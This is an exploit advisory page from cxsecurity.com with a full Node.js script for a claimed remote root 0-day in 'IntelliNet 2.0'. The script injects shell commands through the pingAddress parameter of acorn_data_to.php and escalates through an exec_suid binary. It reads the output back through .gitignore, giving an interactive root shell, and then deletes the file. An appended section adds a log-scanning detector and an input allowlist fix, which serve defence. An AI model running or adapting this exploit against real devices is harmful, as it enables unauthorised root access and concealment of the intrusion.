IntelliNet 2.0 Remote Root

2024.09.03
Credit: Jean Pereira
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/local/bin/node

const { execSync } = require('child_process');
const readline = require('readline');

let TARGET = '';
let COMMAND = '';
let SESSION = '';

const ESCALATE = '/usr/aes/bin/exec_suid';

console.log(`
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣾⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⢀⣼⣿⣧⣶⣶⣶⣦⣤⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⣠⣾⢿⣿⣿⣿⣏⠉⠉⠛⠛⠿⣷⣕⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⣠⣾⢝⠄⢀⣿⡿⠻⣿⣄⠀⠀⠀⠀⠈⢿⣧⡀⣀⣤⡾⠀⠀⠀
⠀⠀⠀⢰⣿⡡⠁⠀⠀⣿⡇⠀⠸⣿⣾⡆⠀⠀⣀⣤⣿⣿⠋⠁⠀⠀⠀⠀
⠀⠀⢀⣷⣿⠃⠀⠀⢸⣿⡇⠀⠀⠹⣿⣷⣴⡾⠟⠉⠸⣿⡇⠀⠀⠀⠀⠀
⠀⠀⢸⣿⠗⡀⠀⠀⢸⣿⠃⣠⣶⣿⠿⢿⣿⡀⠀⠀⢀⣿⡇⠀⠀⠀⠀⠀
⠀⠀⠘⡿⡄⣇⠀⣀⣾⣿⡿⠟⠋⠁⠀⠈⢻⣷⣆⡄⢸⣿⡇⠀⠀⠀⠀⠀
⠀⠀⠀⢻⣷⣿⣿⠿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠻⣿⣷⣿⡟⠀⠀⠀⠀⠀⠀
⢀⣰⣾⣿⠿⣿⣿⣾⣿⠇⠀⠀⠀⠀⠀⠀⠀⢀⣼⣿⣿⣅⠀⠀⠀⠀⠀⠀
⠀⠰⠊⠁⠀⠙⠪⣿⣿⣶⣤⣄⣀⣀⣀⣤⣶⣿⠟⠋⠙⢿⣷⡄⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⢀⣿⡟⠺⠭⠭⠿⠿⠿⠟⠋⠁⠀⠀⠀⠀⠙⠏⣦⠀⠀⠀
⠀⠀⠀⠀⠀⠀⢸⡟⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
╔════════════════════════════════════════════╗
║ IntelliNet 2.0 Remote Root Exploit (0-Day) ║
║ Author: Jean Pereira <info@cytres.com>     ║
╚════════════════════════════════════════════╝
`);

const cleanUp = () => {
  execSync(
    `curl -sL "http://${TARGET}/acorn_data_to.php?cmd=ping-tool&pingAddress=127.0.0.1;rm%20.gitignore;"`
  );
};

const createShell = (cmd) => {
  execSync(
    `curl -sL "http://${TARGET}/acorn_data_to.php?cmd=ping-tool&pingAddress=127.0.0.1;${encodeURIComponent(
      [ESCALATE, cmd].join(' ')
    )}%20%3E%20.gitignore;"`
  );
  return execSync(`curl -sL "http://${TARGET}/.gitignore"`).toString().trim();
};

const rl = readline.createInterface({
  input: process.stdin,
  output: process.stdout,
});

const interactiveShell = () => {
  rl.question(`root@${SESSION.slice(8)}:~# `, (currentCommand) => {
    if (currentCommand.trim() === '!q') {
      console.log('Cleaning up...');
      cleanUp();
      rl.close();
    } else {
      COMMAND = currentCommand;
      let output = createShell(COMMAND);
      console.log(output);
      interactiveShell();
    }
  });
};

rl.question('[*] Enter target IP: ', (targetIP) => {
  TARGET = targetIP;
  SESSION = createShell('echo a1b2c3d4$HOSTNAME');
  if (!SESSION.startsWith('a1b2c3d4')) {
    console.log('[*] Could not execute payload, aborting');
    process.exit(0);
  } else {
    console.log('[*] Payload injected to firmware');
    console.log('[*] Launching root shell via exec_suid');
  }
  console.log('');
  interactiveShell();
});

rl.on('close', () => {
  process.exit(0);
});
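
Added example (not part of the original advisory or the author's code): a Node.js scan of web access logs for the request pattern the script above produces, a `ping-tool` call to `acorn_data_to.php` whose `pingAddress` is not a plain host, followed by a successful fetch of `/.gitignore` by the same client. The combined log format, the sample lines and the name `scanAccessLog` are assumptions constructed for illustration.

```javascript
// Constructed sample lines (combined log format, documentation address ranges).
const SAMPLE_LOG = [
  '198.51.100.7 - - [03/Sep/2024:10:00:01 +0000] "GET /acorn_data_to.php?cmd=ping-tool&pingAddress=192.0.2.10 HTTP/1.1" 200 312',
  '203.0.113.9 - - [03/Sep/2024:10:02:11 +0000] "GET /acorn_data_to.php?cmd=ping-tool&pingAddress=127.0.0.1;%2Fusr%2Faes%2Fbin%2Fexec_suid%20echo%20a1b2c3d4%24HOSTNAME%20%3E%20.gitignore; HTTP/1.1" 200 0',
  '203.0.113.9 - - [03/Sep/2024:10:02:12 +0000] "GET /.gitignore HTTP/1.1" 200 54',
  '198.51.100.7 - - [03/Sep/2024:10:05:00 +0000] "GET /index.php HTTP/1.1" 200 1024',
];

// Allowlist for a ping target: hostname, IPv4 or IPv6 characters only,
// no leading '-', no shell metacharacters or whitespace.
const SAFE_HOST = /^[A-Za-z0-9][A-Za-z0-9.:-]{0,252}$/;
// client, method, request target, status
const LOG_RE = /^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})/;

function scanAccessLog(lines) {
  const findings = [];
  const suspects = new Set(); // clients already seen sending a bad pingAddress
  lines.forEach((line, i) => {
    const m = LOG_RE.exec(line);
    if (!m) return; // not a parsable access-log line
    const [, client, , target, status] = m;
    let url;
    try {
      url = new URL(target, 'http://device.invalid'); // base is a placeholder
    } catch {
      return;
    }
    if (url.pathname === '/acorn_data_to.php' &&
        url.searchParams.get('cmd') === 'ping-tool') {
      const addr = url.searchParams.get('pingAddress') ?? '';
      if (!SAFE_HOST.test(addr)) {
        suspects.add(client);
        findings.push({ line: i + 1, client, rule: 'ping-injection', value: addr });
      }
    } else if (url.pathname === '/.gitignore' && status === '200' &&
               suspects.has(client)) {
      // The script reads command output back through this file.
      findings.push({ line: i + 1, client, rule: 'output-fetch', value: url.pathname });
    }
  });
  return findings;
}

console.log(scanAccessLog(SAMPLE_LOG));
```

The same allowlist, applied server-side to `pingAddress` before it reaches a shell, is the corresponding input-validation fix.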



Copyright 2024, cxsecurity.com

 
